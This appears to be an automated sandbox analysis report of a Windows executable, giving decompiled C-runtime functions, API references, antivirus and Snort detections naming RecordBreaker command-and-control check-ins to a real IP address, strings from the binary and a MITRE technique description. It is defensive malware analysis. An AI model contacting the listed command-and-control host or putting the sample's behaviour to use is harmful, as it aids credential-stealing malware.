0x013b7c26
0x013b7c27
0x013b7c2c
0x013b7c2d
0x013b7c30
0x013b7c4a
0x013b7c4d
0x013b7c52
0x013b7c54
0x00000000
0x013b7c56
0x013b7c62
0x013b7c65
0x013b7c66
0x013b7c68
0x013b7c8b
0x013b7c8d
0x013b7ca4
0x013b7cab
0x013b7cb0
0x00000000
0x013b7c8f
0x013b7c96
0x013b7c9b
0x00000000
0x013b7c9b
0x013b7c6a
0x013b7c71
0x013b7c76
0x013b7c77
0x013b7c77
0x013b7c7c
0x00000000
0x013b7c7c
0x013b7c68
0x013b7c32
0x013b7c38
0x013b7c3a
0x013b7c3c
0x013b7c45
0x00000000
0x013b7c3e
0x013b7c3e
0x013b7c41
0x013b7cbb
0x013b7cbb
0x013b7cc0
0x013b7cc3
0x013b7cc4
0x013b7cc5
0x013b7ccc
0x013b7cce
0x013b7cd3
0x013b7cd6
0x013b7cf4
0x013b7cf7
0x013b7cfc
0x013b7cfe
0x00000000
0x013b7d00
0x013b7d0c
0x013b7d10
0x013b7d12
0x013b7d37
0x013b7d39
0x013b7d52
0x013b7d59
0x00000000
0x013b7d3b
0x013b7d3b
0x013b7d44
0x013b7d49
0x00000000
0x013b7d49
0x013b7d14
0x013b7d14
0x013b7d14
0x013b7d1d
0x013b7d22
0x013b7d23
0x013b7d23
0x00000000
0x013b7d28
0x013b7d12
0x013b7cd8
0x013b7cde
0x013b7ce0
0x013b7ce2
0x013b7cef
0x00000000
0x013b7ce4
0x013b7ce4
0x013b7ce7
0x013b7d61
0x013b7d61
0x013b7ce9
0x013b7ce9
0x013b7ce9
0x013b7ce9
0x013b7ceb
0x013b7ceb
0x013b7ceb
0x013b7ce7
0x013b7ce2
0x013b7d64
0x013b7d6c
0x013b7d6e
0x013b7d6e
0x013b7d75
0x013b7c43
0x013b7cb3
0x013b7cb3
0x013b7cb5
0x00000000
0x013b7cb7
0x013b7cba
0x013b7cba
0x013b7cb5
0x013b7c41
0x013b7c3c
0x013b7c1b
0x013b7c20
0x013b7c20

APIs

GetLastError.KERNEL32(?,?,?,013B3CF8,?,?,?,?,013B63B0,013B729E,?,?), ref: 013B7B6F
_free.LIBCMT ref: 013B7BCC
_free.LIBCMT ref: 013B7C02
SetLastError.KERNEL32(00000000,00000002,000000FF,?,?,?,013B63B0,013B729E,?,?), ref: 013B7C0D

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 08f21fb35a14f41507d21ccbc427b26930c194365655b78a56e316da79aa650f
Instruction ID: d7c19f5d2570d1e334228a57d9e3cb50f7874a0ceef0147a198113f59c52acd8
Opcode Fuzzy Hash: 08f21fb35a14f41507d21ccbc427b26930c194365655b78a56e316da79aa650f
Instruction Fuzzy Hash: C611A9726046062EEB216A7D5CC6DEB399DEFD1BBDF240228F725979C1FD219C014750

Uniqueness

Uniqueness Score: -1.00%

Function 013B7CC1 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E013B7CC1(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x13ca130; // 0x2
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E013B6B20(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E013B675E(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E013B6B20(__eflags,  *0x13ca130, _t18);
							if(__eflags != 0) {
								E013B7998(_t18, 0x13d9b78);
								E013B67BB(0);
								goto L13;
							} else {
								_t13 = 0;
								E013B6B20(__eflags,  *0x13ca130, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E013B6B20(0,  *0x13ca130, 0);
							_push(0);
							L9:
							E013B67BB();
							goto L4;
						}
					}
				} else {
					_t18 = E013B6AE1(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x13ca130; // 0x2
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x013b7ccc
0x013b7cce
0x013b7cd3
0x013b7cd6
0x013b7cf4
0x013b7cf7
0x013b7cfc
0x013b7cfe
0x00000000
0x013b7d00
0x013b7d0c
0x013b7d10
0x013b7d12
0x013b7d37
0x013b7d39
0x013b7d52
0x013b7d59
0x00000000
0x013b7d3b
0x013b7d3b
0x013b7d44
0x013b7d49
0x00000000
0x013b7d49
0x013b7d14
0x013b7d14
0x013b7d14
0x013b7d1d
0x013b7d22
0x013b7d23
0x013b7d23
0x00000000
0x013b7d28
0x013b7d12
0x013b7cd8
0x013b7cde
0x013b7ce2
0x013b7cef
0x00000000
0x013b7ce4
0x013b7ce7
0x013b7d61
0x013b7d61
0x013b7ce9
0x013b7ce9
0x013b7ce9
0x013b7ceb
0x013b7ceb
0x013b7ceb
0x013b7ce7
0x013b7ce2
0x013b7d64
0x013b7d6c
0x013b7d75

APIs

GetLastError.KERNEL32(?,?,?,013B6750,013B3FFE,?,?), ref: 013B7CC6
_free.LIBCMT ref: 013B7D23
_free.LIBCMT ref: 013B7D59
SetLastError.KERNEL32(00000000,00000002,000000FF,?,?,?,013B6750,013B3FFE,?,?), ref: 013B7D64

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 76f54deeecf2a97c4b4bc8994f9bfaa793c451975c7443113e6d66b5277a3759
Instruction ID: b00d9e3f5cdc1498d78a6b7e35c74e5628339edf1fff5ac7718e0cc1471c9299
Opcode Fuzzy Hash: 76f54deeecf2a97c4b4bc8994f9bfaa793c451975c7443113e6d66b5277a3759
Instruction Fuzzy Hash: 4411A57361060A2EDB216A7D9CC5EFA39ADEBD0BBDF24022CF725979C5FE6198014350

Uniqueness

Uniqueness Score: -1.00%

Function 013C0397 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013C0397(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x13ca890, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E013C0380();
					E013C0342();
					_t13 = WriteConsoleW( *0x13ca890, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x013c03b4
0x013c03b8
0x013c03c5
0x013c03ca
0x013c03e5
0x013c03e5
0x013c03eb

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,013BF447,00000000,00000001,00000000,00000000,?,013BBD8B,?,?,00000000), ref: 013C03AE
GetLastError.KERNEL32(?,013BF447,00000000,00000001,00000000,00000000,?,013BBD8B,?,?,00000000,?,00000000,?,013BC2D7,?), ref: 013C03BA

Part of subcall function 013C0380: CloseHandle.KERNEL32(FFFFFFFE,013C03CA,?,013BF447,00000000,00000001,00000000,00000000,?,013BBD8B,?,?,00000000,?,00000000), ref: 013C0390

___initconout.LIBCMT ref: 013C03CA

Part of subcall function 013C0342: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,013C0371,013BF434,00000000,?,013BBD8B,?,?,00000000,?), ref: 013C0355

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,013BF447,00000000,00000001,00000000,00000000,?,013BBD8B,?,?,00000000,?), ref: 013C03DF

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 77b1854c2e775b9b134c0d925962681ecb11d5da4659d4798d7ba53476fe4a33
Instruction ID: 6c6425218404771d48dedb4a05b97a08245ba34b31bde4482f6618d223689bbd
Opcode Fuzzy Hash: 77b1854c2e775b9b134c0d925962681ecb11d5da4659d4798d7ba53476fe4a33
Instruction Fuzzy Hash: 1FF01C3B101169FFCF222FD5DC0899A7F6AFB087A0F008114FA1996120D632DD209B91

Uniqueness

Uniqueness Score: -1.00%

Function 013B6109 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013B6109() {

				E013B67BB( *0x13d9b70);
				 *0x13d9b70 = 0;
				E013B67BB( *0x13d9b74);
				 *0x13d9b74 = 0;
				E013B67BB( *0x13d984c);
				 *0x13d984c = 0;
				E013B67BB( *0x13d9850);
				 *0x13d9850 = 0;
				return 1;
			}

0x013b6112
0x013b611f
0x013b6125
0x013b6130
0x013b6136
0x013b6141
0x013b6147
0x013b614f
0x013b6158

APIs

_free.LIBCMT ref: 013B6112

Part of subcall function 013B67BB: HeapFree.KERNEL32(00000000,00000000,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?), ref: 013B67D1
Part of subcall function 013B67BB: GetLastError.KERNEL32(?,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?,?), ref: 013B67E3

_free.LIBCMT ref: 013B6125
_free.LIBCMT ref: 013B6136
_free.LIBCMT ref: 013B6147

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 32a0a63d879877f5998c093463d5a51af78a7050772f778753ee7cc2dc9436f9
Instruction ID: 12587fbaea5a0eb21270f9ec7a0fd88b9f50a51032a5787f10f74e9cf5fed5d9
Opcode Fuzzy Hash: 32a0a63d879877f5998c093463d5a51af78a7050772f778753ee7cc2dc9436f9
Instruction Fuzzy Hash: CEE0BFB5412261DAC7317F28B9A7E853F6EBB54F0CB46060AED051271DEB310512DF81

Uniqueness

Uniqueness Score: -1.00%

Function 013B51D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E013B51D0(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E013B9998(_t48);
						E013B93DF(_t48, _t57, 0, 0x13d9720, 0, 0x13d9720, 0x104);
						_t26 =  *0x13d9854; // 0xcd33c0
						 *0x13d9844 = 0x13d9720;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x13d9720;
							_v20 = 0x13d9720;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E013B547A(E013B5306( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E013B5306( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E013B92D2(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x13d9848 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x13d984c = _t58;
											L18:
											E013B67BB(_t37);
											_v12 = 0;
											L19:
											E013B67BB(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x13d9848 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x13d984c = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E013B674B(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E013B674B(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E013B4F75();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x013b51d0
0x013b51d9
0x013b51de
0x013b51e8
0x013b51eb
0x013b5208
0x013b5209
0x013b521c
0x013b5221
0x013b5229
0x013b522f
0x013b5232
0x013b5234
0x013b523b
0x013b523b
0x013b523d
0x013b5240
0x013b5243
0x013b524a
0x013b5263
0x013b5268
0x013b526a
0x013b528b
0x013b5293
0x013b5296
0x013b52b1
0x013b52b4
0x013b52bb
0x013b52bf
0x013b52c1
0x013b52c8
0x013b52cb
0x013b52cd
0x013b52cf
0x013b52d1
0x013b52db
0x013b52db
0x013b52dd
0x013b52e3
0x013b52e6
0x013b52e8
0x013b52ee
0x013b52ef
0x013b52f5
0x013b52f8
0x013b52f9
0x013b52ff
0x013b5302
0x00000000
0x00000000
0x00000000
0x00000000
0x013b52d3
0x013b52d3
0x013b52d3
0x013b52d6
0x013b52d7
0x013b52d7
0x00000000
0x013b52d3
0x013b52c3
0x00000000
0x013b52c3
0x013b529b
0x013b529b
0x013b529c
0x013b52a1
0x013b52a3
0x013b52a5
0x013b52aa
0x013b52aa
0x00000000
0x013b52aa
0x013b526c
0x013b5271
0x013b5273
0x013b5274
0x00000000
0x013b5274
0x013b5236
0x013b5239
0x00000000
0x00000000
0x00000000
0x013b5239
0x013b51ed
0x013b51f0
0x00000000
0x00000000
0x013b51f2
0x013b51f9
0x013b51fa
0x013b51fc
0x013b5201
0x00000000
0x013b5201
0x00000000

Strings

C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe, xrefs: 013B5213, 013B521A, 013B5250

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\c35d4e641adf21bead54611499c416c8e2de75ac96098.exe
API String ID: 0-1325067775
Opcode ID: 88f80f20535ac6a9ac6a65d4a0dcc100d1ea7333c18444e44396020930ee0dc4
Instruction ID: 1cb62270b1aa2a459c87e863d5500b93fd0efc93b415c82e7868c2833e045330
Opcode Fuzzy Hash: 88f80f20535ac6a9ac6a65d4a0dcc100d1ea7333c18444e44396020930ee0dc4
Instruction Fuzzy Hash: 354180B1A01219ABDB229B9D98C5AEEBBFCEF95708F140166F604DB640F6708A418B50

Uniqueness

Uniqueness Score: -1.00%

Source: 0.2.c35d4e641adf21bead54611499c416c8e2de75ac96098.exe.13b0000.0.unpack	Avira: Label: ADWARE/Amonetize.Gen7
Source: 0.0.c35d4e641adf21bead54611499c416c8e2de75ac96098.exe.13b0000.0.unpack	Avira: Label: ADWARE/Amonetize.Gen7

Source: Traffic	Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.3:49736 -> 89.208.103.4:80
Source: Traffic	Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 89.208.103.4:80 -> 192.168.2.3:49736

Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: c35d4e641adf21bead54611499c416c8e2de75ac96098.exe	String found in binary or memory: http://www.opera.com0
Source: sqlite3.dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://mozilla.org0
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1g8B3TB8nn75.1.dr, t56OlInDWvo9.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.4

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

